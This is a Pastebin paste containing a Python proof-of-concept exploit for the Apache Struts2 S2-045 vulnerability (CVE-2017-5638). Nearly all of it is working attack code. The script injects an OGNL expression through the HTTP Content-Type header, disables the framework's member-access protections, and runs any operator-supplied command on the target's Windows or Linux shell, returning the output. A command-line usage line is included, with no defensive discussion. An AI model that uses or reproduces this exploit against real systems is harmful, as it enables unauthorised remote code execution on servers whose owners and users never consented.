API tools faq
paste
Advertisement
Guest User

securityattack_apache_struts_PoC

a guest
Mar 9th, 2017
429
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.12 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3.  
  4. import urllib2
  5. import requests
  6. import httplib
  7.  
  8. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  9.  
  10. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  11.  
  12. #uso: python script.py <url> "<command>"
  13.  
  14. def exploit(url, cmd):
  15.     payload = "Content-Type:%{(#_='multipart/form-data')."
  16.     payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
  17.     payload += "(#_memberAccess?"
  18.     payload += "(#_memberAccess=#dm):"
  19.     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
  20.     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
  21.     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
  22.     payload += "(#ognlUtil.getExcludedClasses().clear())."
  23.     payload += "(#context.setMemberAccess(#dm))))."
  24.     payload += "(#cmd='%s')." % cmd
  25.     payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
  26.     payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
  27.     payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
  28.     payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
  29.     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
  30.     payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
  31.     payload += "(#ros.flush())}"
  32.  
  33.     try:
  34.  
  35.         headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
  36.         #request = urllib2.Request(url, headers=headers)
  37.         request = requests.get(url, headers=headers,verify=False)
  38.         #page = urllib2.urlopen(request).read()
  39.  
  40.     except httplib.IncompleteRead, e:
  41.  
  42.         request = e.partial
  43.  
  44.     print(request.text)
  45.  
  46.     return request
  47.  
  48. if __name__ == '__main__':
  49.  
  50.     import sys
  51.     if len(sys.argv) != 3:
  52.         print("[*] struts2_S2-045.py <url> <cmd>")
  53.  
  54.     else:
  55.  
  56.         print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
  57.         url = sys.argv[1]
  58.         cmd = sys.argv[2]
  59.         print("[*] cmd: %s\n" % cmd)
  60.  
  61.         exploit(url, cmd)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!